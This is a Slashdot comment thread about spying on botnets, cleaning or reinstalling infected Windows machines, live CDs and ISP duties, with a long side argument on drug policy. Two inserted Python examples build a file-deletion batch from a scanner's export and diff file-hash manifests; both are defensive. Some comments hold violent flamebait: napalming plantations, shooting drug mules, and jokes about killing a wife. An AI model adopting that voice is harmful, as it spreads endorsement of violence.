      Net result: more crime, not less. Lots of hardship for otherwise innocent people and for what? Because some people don't want other people to be intoxicated for the hell of it? Who do you think you are telling other people what they can or cannot do with their own mind and body?

      Gradual increase in 'deterrents' has never worked. People haven't quit smoking in droves because the taxes went up year after year, they are stopping now because of social pressure and even then some members of the population will keep smoking perhaps even because other people frown upon it. There are other examples like the addiction to gas that isn't hampered by the gradual increase in oil prices. If things suddenly get a lot worse, people are willing to take another look at their habits. Gradual measures are merely a patch on an arterial bleeding and in the case of taxes a nice cash-cow.

      Prisons will fill up. More gradually perhaps, but they will. It is happening as we speak so denying it is pointless. An ever larger portion (as in percentage) of the population is being incarcerated and mostly because of petty crime, not because of institutionalised mob practices. The illegalisation of drugs is one of the major driving forces behind organized crime so your argument is upside down, from a mere practical perspective at least.

      As for your other arguments: it is clear you like strict government control on other people's behaviours yet you say you despise the ones exercising it to the ultimate extent. Rather strange philosophy you keep. I do hope no future government in your country will consider your morals 'reprehensible' and put you in jail for it with the measures you now propose for the 'gang-infested communities' of today.

      I also hope you get a better sense of what is 'right' and what is 'right according to you'. There is a difference, you know.

      All the best.

      --
      Karma? What's that again?
    24. Re:Makes you wonder what else is going on by mapkinase · · Score: 1

      A similar experiment, limiting alcohol consumption, was done in Russia at the beginning of the Gorbachev era. The result was a peak in life expectancy.

      The problem with us Americans is that we think it is our sacred right to do whatever harm we want to ourselves. This is the idiocy of the overblown cornerstone of American democracy, "the right to pursue happiness". Alright, do whatever you want to pursue happiness, but not at my expense, my friend.

      If you come to me on the street threatening to kill me for $20 needed for drugs, be pretty sure, I want to eliminate the crazy person and the industry behind his craziness. This is pursuit of MY happiness. _I_ will be happy when the drugs are stomped upon with an iron foot. _I_ will be happy when Colombia is isolated from the world community, when the plantations are burned by napalm. When every mule entering the country is shot in the airport in front of travellers.

      This is pursuit of MY happiness. How about that, liberal wussy?

      --
      I do not believe in karma. "Funny"=-6. Do good and forbid evil. Yours, Oft-Offtopic Flamebaiting Troll.
    25. Re:Makes you wonder what else is going on by geschild · · Score: 1

      You are simply reiterating the same faulty argumentation you've been fed without any critical thinking. I think most sane people would agree that any crimes against others should be punished, including the addict that robs someone to satisfy his/her habit. There are laws for those crimes that are fine in and of themselves. The problem begins when people are pushed into crime because the act of using/possession is made an offense. Using drugs isn't a crime against anyone. Most other behaviour that only endangers oneself is still allowed, and even some behaviour, like riding a motor-bike or climbing mountains, that can put other lives in danger is allowed as well. Anything illegal you do because of the drug or the habit is a crime and should be punishable.

      I'm not saying drugs should be easily accessible, I'm saying that they shouldn't be illegal per se because it doesn't dissuade people from using. Regulate, tax (to compensate for social damages for instance), do whatever is needed but don't make it a crime in and of itself.

      I hope you stay happy even though you are now labeling me :) Please remember that in order for all to be able to pursue happiness, pursuing one's happiness shouldn't infringe on someone else's pursuit of happiness, but that seems to be what you are doing.

      --
      Karma? What's that again?
    26. Re:Makes you wonder what else is going on by mapkinase · · Score: 1

      No. I am doing my pursuit in reply to violation of my rights for my basic right to live.

      I like how the problem is solved in Singapore. Unfortunately, the climate over there is horrible.

      --
      I do not believe in karma. "Funny"=-6. Do good and forbid evil. Yours, Oft-Offtopic Flamebaiting Troll.
    27. Re:Makes you wonder what else is going on by geschild · · Score: 1

      Please help me out here, I'm quite sure I must be misunderstanding you completely.

      You are pursuing happiness by pursuing people whom you perceive as violating your basic right to live simply by them using drugs?

      If that is correct then my, are you both the overly sensitive and the depraved kind rolled into one! :D

      I suggest you try and get used to the Singaporean climate. I think you are more likely to get used to the climate in Singapore than you'll be able to get over feeling threatened by people using drugs. Besides, it'll be a win-win situation because we won't have to hear you rant without reason.

      --
      Karma? What's that again?
    28. Re:Makes you wonder what else is going on by mapkinase · · Score: 1

      Why don't you go somewhere else? I can share this country with you, my little liberal friend, it seems to me that you have a problem with me.

      --
      I do not believe in karma. "Funny"=-6. Do good and forbid evil. Yours, Oft-Offtopic Flamebaiting Troll.
    29. Re:Makes you wonder what else is going on by geschild · · Score: 1

      I think I've shown ample room for you to express yourself. You are the one bitching about the circumstances around where you live, denying others their right to pursue happiness the way they want because it doesn't match how you perceive happiness. You are wishing for more government interference which is so neo-con (and so passe).

      The only problem I have here is not with you but with your assertion of your own rights above those of others. You mentioned Singapore, not me, I just pointed out that if you think it is so great there and the only thing holding you back is the climate, then you're probably better off over there, accepting a lesser climate. And yes, you living in Singapore would benefit more people than just you, but that's beside the point. I'm just trying to help you make up your mind :).

      Have a nice life but please, think of the children. ;)

      --
      Karma? What's that again?
    30. Re:Makes you wonder what else is going on by mapkinase · · Score: 1

      This discussion is going nowhere. Last zillion posts were just byte-waste

      --
      I do not believe in karma. "Funny"=-6. Do good and forbid evil. Yours, Oft-Offtopic Flamebaiting Troll.
  12. malware-free system?-Linux. by Anonymous Coward · · Score: 5, Funny

    "Until someone creates something that can infect the various *nixes that is."

    That's impossible. How do I know? Just "Ask Slashdot".

    1. Re:malware-free system?-Linux. by Anonymous Coward · · Score: 0

      You mean "unpossible", don't you?

  13. Be sure... by shmlco · · Score: 4, Funny

    "The only way to be [completely] sure the system is malware-free is to completely wipe the hard drive and reinstall the operating system."

    I say we take off and nuke 'em all from orbit. It's the only way to be sure.

    --
    Any sect, cult, or religion will legislate its creed into law if it acquires the political power to do so.
    1. Re:Be sure... by Linker3000 · · Score: 1

      Thank you - I had to scroll down several inches to see that comment but you have restored my faith in the Slashdot community.

      I nearly thought that one had slipped through the next.

      --
      AT&ROFLMAO
    2. Re:Be sure... by Linker3000 · · Score: 1

      May I have my 'x' back please!

      --
      AT&ROFLMAO
    3. Re:Be sure... by modecx · · Score: 1

      "The only way to be [completely] sure the system is malware-free is to completely wipe the hard drive and reinstall the operating system."

      I say we take off and nuke 'em all from orbit. It's the only way to be sure.


      Hey! That's my idea for people who drive while talking on a cell phone, damnit! You just can't go around stealing other people's ideas so you can go twist them to fit some other problem! I mean, you know what happened the last time someone used a cotton gin to do something it wasn't meant to do? I'll tell you this, it was a tragic day that five men including Burt Reynolds, a goat, a family of opossums, and a small town in Arkansas will NEVER forget!

      --
      Constitutional rights may be respected, repealed, or modified; but they must never be ignored.
  14. so many only/lonely ways. by mapkinase · · Score: 4, Funny
    The only way to be [completely] sure the system is malware-free is to completely wipe the hard drive and reinstall the operating system.'
    In other news: the only way to be completely sure your wife is not cheating on you is to whack her and her alleged boyfriend.
    --
    I do not believe in karma. "Funny"=-6. Do good and forbid evil. Yours, Oft-Offtopic Flamebaiting Troll.
    1. Re:so many only/lonely ways. by Odin's+Raven · · Score: 1
      In other news: the only way to be completely sure your wife is not cheating on you is to whack her and her alleged boyfriend.

      I dare say that whacking just the wife would be sufficient to put a stop to her cheating. Not to mention cheaper.

      (Unless you have a 2-for-1 coupon from the local mob - no sense letting a freebie go to waste.)

      --
      A marriage is always made up of two people who are prepared to swear that only the other one snores.
    2. Re:so many only/lonely ways. by Jack+Action · · Score: 1
      The only way to be [completely] sure the system is malware-free is to completely wipe the hard drive and reinstall the operating system.'
      In other news: the only way to be completely sure your wife is not cheating on you is to whack her and her alleged boyfriend.
      Isn't this equivalent to whacking yourself?
    3. Re:so many only/lonely ways. by mapkinase · · Score: 1

      That will certainly solve all your worldly problems, but will it solve all your problems.

      --
      I do not believe in karma. "Funny"=-6. Do good and forbid evil. Yours, Oft-Offtopic Flamebaiting Troll.
    4. Re:so many only/lonely ways. by Anonymous Coward · · Score: 0
      That's like the ancient joke:

      A guy comes home and finds his wife in bed with another man. He flies into a rage, grabs his gun, and shoots his wife. The naked man says, "I was the one sleeping with your wife, why did you shoot her and not me?"

      The husband says, "Is it not better to shoot a woman once than a different man every week?"

  15. From TFA... by dark-br · · Score: 1

    "The lesson? Don't get infected in the first place"

    Oh, *R*E*A*L*L*Y*? Gotta love some people's approach to security articles :/ *grin*

  16. The only way to be [completely] sure... by Harlequin · · Score: 1, Redundant
    The only way to be [completely] sure the system is malware-free is to completely wipe the hard drive and reinstall the operating system.
    Ripley: I say we take off and nuke the entire site from orbit. It's the only way to be [completely] sure.
  17. Steve Gibson did something akin to this by BertieBaggio · · Score: 5, Informative

    I know he may not be the most favourite of people around here, but Steve Gibson was able to spy on the IRC command & control channel of a botnet a few years ago. It was precipitated by a DDoS on his site, which he investigated rather thoroughly.

    Link to the article (...long article warning)

    Some of the article is quite interesting, some is obvious, some is ego-boosting self-congratulatory statements, and some of it is his "teh XP can create complete 'UNIX sockets' OH NOES!" propaganda. Still worth a read, even if it is a few years old.

    --
    If all you have is a grenade, pretty soon every problem looks like a foxhole -- MightyYar
    1. Re:Steve Gibson did something akin to this by Fulkkari · · Score: 1

      I was under the impression that since Windows XP SP2, Microsoft decided to disable raw sockets. Gibson's concerns were valid. There is no reason why there should be raw socket functionality on any consumer-level product. Raw sockets may not make the computer itself more vulnerable, but they definitely can make it a bigger threat to other machines and networks once compromised. The casual user doesn't use them and therefore won't even notice they're gone, not to speak of knowing about their existence in the first place. Just because a couple of guys want to play around with their network on their Windows XP Home Editions, you shouldn't enable raw sockets on the rest of the 99.9% of the computers. Period.

      --
      I demand the Cone of Silence!
  18. Need to hold users responsible. by Rotten168 · · Score: 5, Insightful

    If you are a computer user, you are responsible for the problems they are creating. ISP's need to inform people they have bots and if they are infecting other computers they need their internet access dropped. Tough love.

    1. Re:Need to hold users responsible. by poolmeister · · Score: 1

      Some ISPs do just that. I used to work for the abuse team for a cable ISP in the UK.
      We had a policy of disconnecting customers who we'd found to have worm or spambot activity originating from their address.
      If we weren't able to contact them straight away, we'd disconnect with the prejudice they deserved... n00bs

      --
      CN=poolmeister.OU=lurkers.CN=slashdot
    2. Re:Need to hold users responsible. by Tom · · Score: 1

      ISP's need to inform people they have bots and if they are infecting other computers they need their internet access dropped.

      Not going to happen in a million years, I'm afraid.

      See, I happen to be the resident security dude at an ISP (half a million customers). Management doesn't care and doesn't understand that this is a problem that needs attention. It's the customer's computer, monitoring traffic costs money, shutting out customers creates service calls (thus costing money), doing what no one else does might drive customers away (costing money), someone needs to install and monitor the system (and that someone will be costing money) and besides, the only damage to the ISP is more traffic and traffic costs next to nothing anyways.

      I would be surprised if there were many ISPs thinking differently.

      --
      Assorted stuff I do sometimes: Lemuria.org
    3. Re:Need to hold users responsible. by 99BottlesOfBeerInMyF · · Score: 1

      ISP's need to inform people they have bots and if they are infecting other computers they need their internet access dropped. Tough love.

      And this gets the ISPs more money in what way? Many ISPs can pull up and print out a list of infected hosts by worm and by the amount of traffic they generate. They can automatically integrate this into their notification system and send e-mail to the host's account or shut down access. They don't because then they have to answer the phone calls explaining what is going on and that costs them money. It is easier to throttle that host's traffic and filter out the worm propagation traffic to their core than it is to deal with users' broken Windows installs. If it hits other hosts in the same router group, why should they care?

  19. Reinstalling is not always the answer by electronerdz · · Score: 2, Interesting

    There is no reason to just reinstall the operating system just because you got a little bit of spyware. Only about 1% of the machines that I have worked on because of spyware have I had to reinstall the operating system. The infection can always be completely gotten rid of. I've only had call backs about spyware that I missed about 3 times. And for all I know, it was because the user went and downloaded something again that put it on there (like Party Poker, etc). And it can all be done with just a handful of tools (where AdAware is NOT included), and a little bit of creative thinking. For example, recently, I booted a computer into safe mode and used AVG Free to check for viruses. It picked up about 3000 "Trojan.Downloaders." Once it found them, I hit delete for all of them. It took about 30 seconds a file (you do the math). Well, I had two hours before the guy got on a plane. So I exported the list to CSV. Opened it in Excel, deleted all columns except the file names, and put a "del" column to the front. Save, rename to .bat or .cmd, and run. They were deleted in about 20 seconds.

    --
    Kernel Krunch - Part of a Complete OS
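
As an added example (not the commenter's own script): the "export the detections to CSV, prepend del" trick from the post above, done with Python's csv module instead of Excel. Doing it this way keeps quoted paths containing commas or spaces intact, quotes each path for cmd.exe, and holds back anything flagged under a system directory for manual review instead of deleting it blindly. The CSV layout and the sample rows are constructed for the example and are not AVG's real export format; the protected roots are an assumed list.

```python
import csv
import io
import ntpath

# Constructed sample export in an assumed layout (not AVG's real one). Note the
# quoted path containing a comma and the paths containing spaces: both break the
# "delete the other columns in Excel and prepend del" approach.
SAMPLE_CSV = r"""Status,Name,Path
infected,Trojan.Downloader,C:\Documents and Settings\bob\Local Settings\Temp\abc.exe
infected,Trojan.Downloader,"C:\Program Files\Party, Poker\pp.exe"
clean,,C:\WINDOWS\system32\kernel32.dll
infected,Trojan.Downloader,C:\WINDOWS\system32\svchost.exe
"""

# Assumed list: detections under these roots are held back for manual review,
# because a false positive on a system binary turns a cleanup into a rebuild.
PROTECTED_ROOTS = (r"C:\WINDOWS\system32", r"C:\WINDOWS\system")


def flagged_paths(csv_text):
    """Return the Path column of every row the scanner marked infected."""
    reader = csv.DictReader(io.StringIO(csv_text))
    return [row["Path"] for row in reader if row["Status"].strip().lower() == "infected"]


def is_protected(path):
    """True if path lies under one of PROTECTED_ROOTS (case-insensitive, either separator)."""
    p = ntpath.normcase(ntpath.normpath(path))
    for root in PROTECTED_ROOTS:
        r = ntpath.normcase(ntpath.normpath(root))
        if p == r or p.startswith(r + "\\"):
            return True
    return False


def build_batch(csv_text):
    """Build cmd.exe lines that delete the flagged files; hold back protected ones."""
    lines = ["@echo off"]
    skipped = []
    for path in flagged_paths(csv_text):
        if is_protected(path):
            skipped.append(path)
            continue
        # Windows paths cannot contain a double quote, so quoting is safe here.
        lines.append('del /F /Q "%s"' % path)
    return lines, skipped


if __name__ == "__main__":
    batch, review = build_batch(SAMPLE_CSV)
    print("\n".join(batch))
    print("review by hand:", review)
```

Write the returned lines to a .cmd file and run it from the same safe-mode session; the skipped list is what you look at by hand before deciding whether those detections are real.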
    1. Re:Reinstalling is not always the answer by Thunderbear · · Score: 2, Insightful

      I congratulate you on your efficiency.

      But how can you be _certain_ that you got them all, and that your boss is not still infected?

      --

      --
      Thorbjørn Ravn Andersen "...and...Tubular Bells!"
    2. Re:Reinstalling is not always the answer by leenks · · Score: 4, Insightful

      How do you know? At any given time virus / spyware checkers only get between 30 and 50 percent of malware that is currently being used, and it takes several months before they eventually get detected. If you can remove stuff that nobody else can detect, you are doing pretty well.

    3. Re:Reinstalling is not always the answer by httptech · · Score: 1

      We're not just talking about spyware here - you feel you've completely cleaned the infection because you no longer notice the intrusive symptoms of popup-ads, slowness, etc. However, how would you know the initial infection hadn't subsequently downloaded a keystroke logger (bought commercially, they can go months without being detected by AV) along with a rootkit to hide it? Rootkit scanners, like AV, are having to play a constant game of keep-up with the commercial malware writers.

      If you're a malware expert, yes, you can find and kill all instances of malware on a system without a rebuild. It used to be easier, but the profit motive has really upped the ante for the malware writers, to the point where for 99.999% of the population, a rebuild is in order.

      -Joe

    4. Re:Reinstalling is not always the answer by Anonymous Coward · · Score: 2, Funny

      You are a pseudo-geek with a handful of windoze skills who has no idea how much he doesn't know. Congratulations on writing some crappy .bat script, you are officially eligible to work in the tech support department at Best Buy.

    5. Re:Reinstalling is not always the answer by Anonymous Coward · · Score: 0
      So I exported the list to CSV. Opened it in Excel, deleted all columns except the file names, and put a "del" column to the front. Save, rename to .bat or .cmd, and run.
      When the only tool you have is a hammer, every problem looks like a nail. Meanwhile, on a modern OS, a user would just type "virusscan | xargs rm" or "rm `virusscan`"
    6. Re:Reinstalling is not always the answer by Kjella · · Score: 1

      There is no reason to just reinstall the operating system just because you got a little bit of spyware. Only about 1% of the machines that I have worked on because of spyware have I had to reinstall the operating system.

      Well, kudos to you but the last two machines I tried that on, it didn't work. Processes were restarting, files were locked, files were copied back when I deleted them, safe mode or not. Perhaps if I had a rescue CD with uncompromised tools on it and could nuke everything from orbit then maybe. I tried that but some of the tools didn't seem to have any easy "run from CD" options. Took what I could find, but it wasn't enough and it invited all its friends back over.

      Now I consider myself well experienced with computers, and while I'm sure there's some slashdot geeks who'd run circles around me, most people can't. The kid next door or that IT student down the street won't in general be able to do it. Hell, most shops I know don't want to try, because the failure rate is so high. Plus all the funny bits about users reinstalling the crapware and thinking you're to blame because it returned.

      If it'd had been my machine I'd give it a shot, not that it ever has those problems. But it wouldn't take long before I went looking for the install CD...

      --
      Live today, because you never know what tomorrow brings
    7. Re:Reinstalling is not always the answer by Anonymous Coward · · Score: 0

      > If you can remove stuff that nobody else can detect, you are doing pretty well.

      There's no substitute for knowing what's *supposed* to be on a machine. Granted, it's not easy by any means, but I have about a zillion copies of the same image of 'doze at work, and I know pretty well what belongs and what doesn't. So I just fire up a few information gathering tools to find all the things running, find the things that don't belong, trace what they're doing, and wipe them out manually.

      Not the easiest thing in the world, by any means, but it gives me a little more confidence than only knowing that $product has just scanned 100% of the c: drive for known threats.
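
As an added example, not the commenter's own tooling: the "know what is supposed to be on the machine" approach as a manifest diff. A known-good copy of the image is hashed once into a baseline; the suspect tree is hashed the same way and the two are compared, reporting files that were added, removed or changed. The directory layout and file contents are constructed for the example; the names only mimic a Windows install. The caveat the thread itself raises still applies: a kernel rootkit on the running system can hide files from the directory walk and lie about their contents, so hash the suspect drive from a boot CD, not from inside the infected OS.

```python
import hashlib
import os
import tempfile


def sha256_file(path):
    """Hash a file in chunks so large binaries are not read into memory at once."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def manifest(root):
    """Map every file under root (relative, '/'-separated) to its SHA-256."""
    out = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            out[rel] = sha256_file(full)
    return out


def diff_manifests(baseline, suspect):
    """Report what differs between a known-good manifest and a suspect one."""
    base_keys, sus_keys = set(baseline), set(suspect)
    return {
        "added": sorted(sus_keys - base_keys),
        "removed": sorted(base_keys - sus_keys),
        "modified": sorted(p for p in base_keys & sus_keys if baseline[p] != suspect[p]),
    }


def _populate(root, files):
    """Write a constructed tree from {'relative/path': bytes}."""
    for rel, data in files.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as f:
            f.write(data)


# Constructed sample image; contents are placeholders, not real binaries.
CLEAN_IMAGE = {
    "WINDOWS/system32/kernel32.dll": b"kernel32 placeholder",
    "WINDOWS/system32/svchost.exe": b"svchost placeholder",
    "WINDOWS/notepad.exe": b"notepad placeholder",
}


def demo():
    """Hash the clean tree and a tampered copy of it, and return the differences."""
    tampered = dict(CLEAN_IMAGE)
    tampered["WINDOWS/system32/svchost.exe"] = b"svchost placeholder + patched stub"  # trojanized
    tampered["WINDOWS/system32/msupdate32.dll"] = b"dropped component"  # new file
    del tampered["WINDOWS/notepad.exe"]  # something a cleanup tool removed
    with tempfile.TemporaryDirectory() as base, tempfile.TemporaryDirectory() as sus:
        _populate(base, CLEAN_IMAGE)
        _populate(sus, tampered)
        return diff_manifests(manifest(base), manifest(sus))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(kind, paths)
```

In practice the baseline is generated once per image revision and stored off the machine; everything in "added" and "modified" is the list to trace, and a legitimate update will show up there too, so the baseline has to be refreshed after patching.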

  20. Windows LiveCD by Coopjust · · Score: 2, Interesting

    The Windows live CD you are thinking about is BartPE, but it's not as easy to use or setup as a Linux LiveCD.

    I did set up one myself. It works pretty well once setup.

    1. Re:Windows LiveCD by Anonymous Coward · · Score: 2, Informative

      Actually, I think the one you are thinking of is Ultimate Boot CD for Windows http://www.ubcd4win.com/ which is a very functional live cd. Also has numerous other tools that make cleaning an infected system, creating admin accounts, and other cool maintenance a breeze.

    2. Re:Windows LiveCD by poolmeister · · Score: 2, Informative

      UBCD for Windows is just a collection of Barts PE plugins to help you build your own Windows Live CD from Barts PE and your Windows disk, even then it's only really a maintenance CD, you wouldn't want to use it as a Live boot OS, I've tried it on many PCs in the past and I've never been able to get networking going once.
      Windows is inherently a bad choice for a live boot OS because of the messy issue of having as many 3rd party drivers as possible loaded into the image.

      Linux distros are now miles ahead of Windows when it comes to hardware detection on first boot.

      --
      CN=poolmeister.OU=lurkers.CN=slashdot
    3. Re:Windows LiveCD by Yyrkoon420 · · Score: 1

      Miles ahead if you're lazy perhaps; there's another tool seemingly lost on you: 'slipstreaming'. You can manually slipstream, or use third-party GUI tools. I think we all can agree Windows is NOT like Linux in many respects: one is that you actually have to pay for someone else's hard work; two, while Windows may make updates available via the internet, you cannot download a freshly made ISO (at least not without a high-level MSDN subscription you can't). Anyhow, the only other option for this case is slipstreaming, and if you think about it, it's easier on bandwidth, and less time consuming than downloading an entire ISO from whatever distro you prefer. Yes, we also know that Linux has live updates as well . . . Now, why live CD if not for maintenance? At least in this situation that's the whole idea, removal of malicious software. You need something to mount a drive in a way that makes removing malware easier. Personally, I'd never use a Linux LIVE CD to 'fix' anything on a Windows system, but I actually know about, and know how to use, the tools available for said operating system. Would you use a 'LIVE' Windows CD to remove rootkits from Linux? Somehow I don't think so.

    4. Re:Windows LiveCD by ozmanjusri · · Score: 3, Funny
      Windows is NOT like Linux in many respects, one is that you actually have to pay over and over and over again for someone else's hard work

      Fixed that for you.

      --
      "I've got more toys than Teruhisa Kitahara."
    5. Re:Windows LiveCD by Yyrkoon420 · · Score: 1

      It's obvious that you need to read your own quote.

    6. Re:Windows LiveCD by poolmeister · · Score: 1

      @Yyrkoon

      Calm down & pay attention before you fly off the handle with mis-read assumptions: were we talking about 'fixing' anything with Live boot OSs?
      We were talking in the context of using a Live disk as a non volatile operating system, not for fixing a hosed installed OS.

      Then you dribble on about...

      "Now, why live CD if not for maintenance ?"

      err... did I say this?


      "Personally, I'd never use a Linux LIVE CD to 'fix' anything on a windows system,"

      Then you don't know what you're doing, or maybe you just prefer to spend hours setting up a CD that enables you to click a button to receive a problem report from an unguaranteed 3rd party program... STFU.


      "Miles ahead if you're lazy perhaps, there another tool seemingly lost on you 'slipstreaming'."

      You seemed to miss the bit about BartsPE didn't you, which still (in my opinion) doesn't make Windows any more successful as a Live boot OS, all very well if you're going to use it on one or two PCs but not practical otherwise, I'm not saying it's impossible, note I said NOT PRACTICAL, write that down if you like.

      --
      CN=poolmeister.OU=lurkers.CN=slashdot
    7. Re:Windows LiveCD by zacronos · · Score: 1
      Now, why live CD if not for maintenance ? Atleast in this situation thats the whole idea, removal of malicious software.
      I think you missed the point -- I believe the idea of using a live CD was brought up as a suggestion for how you always run your system, not for how you perform maintenance on your system. Why, you ask? Because if the OS is on a CD in a non-writing CD-ROM drive, the OS can't be infected by malware, or at least only until the next time you reboot. In other words, the idea is that this sort of "maintenance" (removing malware) isn't really necessary if you are always running from a live CD, because you just need to reboot.

      Now, with that said, I'm sure it's still possible to infect your system by writing to your networked files; maybe it wouldn't give root access automatically on reboot, but every time you execute a certain file. Unless you don't do any software development, script writing, etc., or roll your CD on a very regular basis, you'll still have executable files on a writable mount. I know that restriction makes installing rootkits much harder, but I wouldn't want to claim it is impossible.
    8. Re:Windows LiveCD by ericlondaits · · Score: 1
      I think you missed the point -- I believe the idea of using a live CD was brought up as a suggestion for how you always run your system, not for how you perform maintenance on your system. Why, you ask? Because if the OS is on a CD in a non-writing CD-ROM drive, the OS can't be infected by malware, or at least only until the next time you reboot.
      A system partition mounted as ro should be a pretty solid alternative to this approach, I guess. You can keep the image in a CD and just write over it if a hacker finds a way to bypass it (which shouldn't be easier than bypassing the OS in the CD).
      --
      As a Slashdot discussion grows longer, the probability of an analogy involving cars approaches one.
    9. Re:Windows LiveCD by Yyrkoon420 · · Score: 1

      Sorry guy, topic is 'spying on botnets'.

    10. Re:Windows LiveCD by Yyrkoon420 · · Score: 1

      Well, I think you and that other guy missed MY point. This article's discussion topic is about malware / viruses. BartPE is a PoS. ERD 200x IS basically a live CD, but will only run for 24 hours at a time before shutting down, you also *gasp* have to pay for it . . . Now back to what I was talking about, you were saying that Windows loads tons of unneeded drivers, well that's why I said slipstreaming, you do know what slipstreaming _is_, don't you? You can remove / add any amount of drivers you like, turn on / off services, and basically adjust any aspect of a Windows XP setup disk, but this doesn't make a live CD. Now if you two were talking about running live CDs as an alternative to running an OS from HDD, then it would be nice if you two stayed on topic and made these things clear.

  21. Server counterpart to this by Alex+Belits · · Score: 4, Informative

    How a server got compromised and ran a PayPal scam site for two days, a more technical explanation of what happened, and how to (and how not to) make Yahoo block the accounts involved. Of course, the idea that a compromised machine can in any way be trusted sounds like one of the stupidest things ever thought up by a human.

    --
    Contrary to the popular belief, there indeed is no God.
    1. Re:Server counterpart to this by makomk · · Score: 1

      I always wondered why Windows machines were more often chosen as targets than Linux ones, and now it's obvious - the script kiddies doing the hacking can't cope with all the little variations between distros...

  22. Need to hold ISP's responsible by RKBA · · Score: 4, Insightful

    "ISP's need to inform people they have bots and if they are infecting other computers they need their internet access dropped."

    In my experience, the cable installers are clueless. When I switched from DSL to Cable, the cable installers (two of them, one was a trainee) hooked up their cable to my router/hardware firewall and everything was fine. Then the senior guy asked if he could hook up their cable box directly to my computer to show the trainee how they normally do things. After booting into a spare version of the OS that I only use for maintenance (which is on a different partition than my regular OS), I let him hook his cable directly up to my computer, bypassing my router. Within about 20 seconds my antivirus program detected and reported a virus attack, although I forget the exact details because it was several years ago.

    The point is that the cable installers connect their cable up to new subscribers' computers without even checking their virus protection, and the naive users' computers are probably infected before the installers drive away. The ISP would be far better off supplying hardware router/firewalls to their customers gratis because of the reduced traffic load from zombie computers.

    1. Re:Need to hold ISP's responsible by Grand+Facade · · Score: 1

      Initiate a support call to your ISP and the first thing they tell you to do is to remove your firewall/router in order to troubleshoot your connection...

      Bastards

      --
      Rick B.
    2. Re:Need to hold ISP's responsible by CronoCloud · · Score: 1
      the ISP would be far better off supplying hardware router/firewalls to their customers gratis because of the reduced traffic load from zombie computers.


      The local cable ISP used to say home networks were unsupported and would ask you to remove the router if you had troubles. They also charged $5 per additional computer (or other device) attached to the connection (for the IP address).

      Now they have networking information on their website and include routers as part of connection packages.
    3. Re:Need to hold ISP's responsible by acaspis · · Score: 1
      Bad idea. If you hold ISPs responsible, they will have no choice but to interfere with what you do with your computer. They won't let you connect to the net unless you are running Windows build #XXXX with firewall Y and antivirus Z. This can easily be done with Trusted Computing and Trusted Network Connect.


      Both of these technologies are great for corporate networks, but I hope you can see where this leads if they become mandatory on your personal machine.

      AC

    4. Re:Need to hold ISP's responsible by not_hylas(+) · · Score: 1

      O-M-G, I see smart people.

      We do need to hold ISPs responsible to police their own neighborhoods (fat chance really).
      For you that say this will infringe on your privacy ... check your TOS, your DSL/cable contracts are written by people that make mazes seem straightforward.

      Brave New World
      Corporations, ISPs, Spammers, Crackers - think: circlejerk
      No one's gonna do nothing about anything and they'll enforce it too.
      ref: screwed-blued-tattooed, NO CARRIER joke

      http://www.macrovision.com/

      http://www.softsummit.com/index.shtml

      Old examples (where do you think you stand now?)

      http://www.dslreports.com/forum/remark,2122413~root=comcast~mode=flat

      http://arstechnica.com/news.ars/post/20030922-2852.html

      http://wiki.phoenixlabs.org/wiki/Type's_of_Infringement_Letters

      I hope I'm wrong, this internet thingy could be really cool if we could just find a really good "front door" of sorts and quit chaining down ALL THE FURNITURE, something we could run *anything*, completely unpatched, behind, tele-commute with bunny slippers on, like God intended.
      That freedom alone would contribute to ending dependence on oil.

      Incidentally, by reading this you're agreeing to:

      just kidding.

      "it's only after you've lost everything that you are free to do anything"
      Fight Club

      --
      ~hylas
  23. Trusted Computing.... and Windows by Lord+Prox · · Score: 1

    Just a thought... With Windows security being what it is, how long will it be before a malware author or spamhouse coder gets their stuff installed as trusted code? Then things really will be hard to remove.

    Second thought. This could be a good thing. After a while of malware being "trusted" will people and companies abandon the TCP program? I am not a big fan of the TCP concept and this outcome could be the answer to getting rid of it. Or not.


    1. Re:Trusted Computing.... and Windows by Short+Circuit · · Score: 1

      It'll likely remain in systems, just rarely used or updated. Like floppy drives, serial ports, parallel ports, the AT keyboard architecture (of which PS/2 keyboards are essentially a clone), and CGA and EGA video modes.

      To cut costs, it'll get integrated into the northbridge/southbridge pair of chips. The x86 system is (in)famous for its support of and occasional dependency on legacy systems. Did you know that you can still run MS DOS on most modern computers?

    2. Re:Trusted Computing.... and Windows by Anonymous Coward · · Score: 0

      Ninja please, TC/Palladium could bend Joe User over and fuck him in the ass every time he sat down to use the computer and he'd still grit his teeth and take it like a champ. Working the front lines of tech support has taught me that the average user is stupid. Far more stupid than anyone on Slashdot can imagine. Windows is all they'll ever know because they are incapable of understanding anything even slightly different, and if Windows comes bundled with all manner of DRM and TC technologies that make the user's life a living hell, they'll take it and they'll tell their friends how great it is. This might change in 20-30 years as more people grow up with computers and understand them more (and fear them less) but for the immediate future we're stuck swallowing shit because Joe User likes the taste.

    3. Re:Trusted Computing.... and Windows by real_b0fh · · Score: 1

      Nobody forces you to use Windows and 'swallow shit' like you say, dude.

      There are plenty of alternatives out there.

      --
      "Contrary to popular belief, UNIX is user friendly. It just happens to be selective on who it makes friendship with"
  24. For the record... by httptech · · Score: 1, Insightful

    It's not like I'm the only one who ever figured out how to spy on botnet control channels. This has been going on for years. Some researchers only spy on the botnet to find out what the botnet is being used for. Some even take it upon themselves to try and "clean" the infected systems of the bots (Mocbot has a "remove" command, by the way, but you have to have the correct user@host mask). Botherders sometimes even spy on each other's channels, to try and take control of less-protected botnets from other botherders.

    -Joe

  25. Too easy... by MoogMan · · Score: 4, Funny

    My house was robbed once... even with fully locked doors, up to date alarm company subscription, and a dog.

    You probably had Windows...

    1. Re:Too easy... by suffe · · Score: 1

      100% of houses being robbed have windows. Coincidence? I think not!

      --

      Karma: 2.71828182846 (Mostly due to small, fun pills)
    2. Re:Too easy... by 99BottlesOfBeerInMyF · · Score: 1

      You probably had Windows...

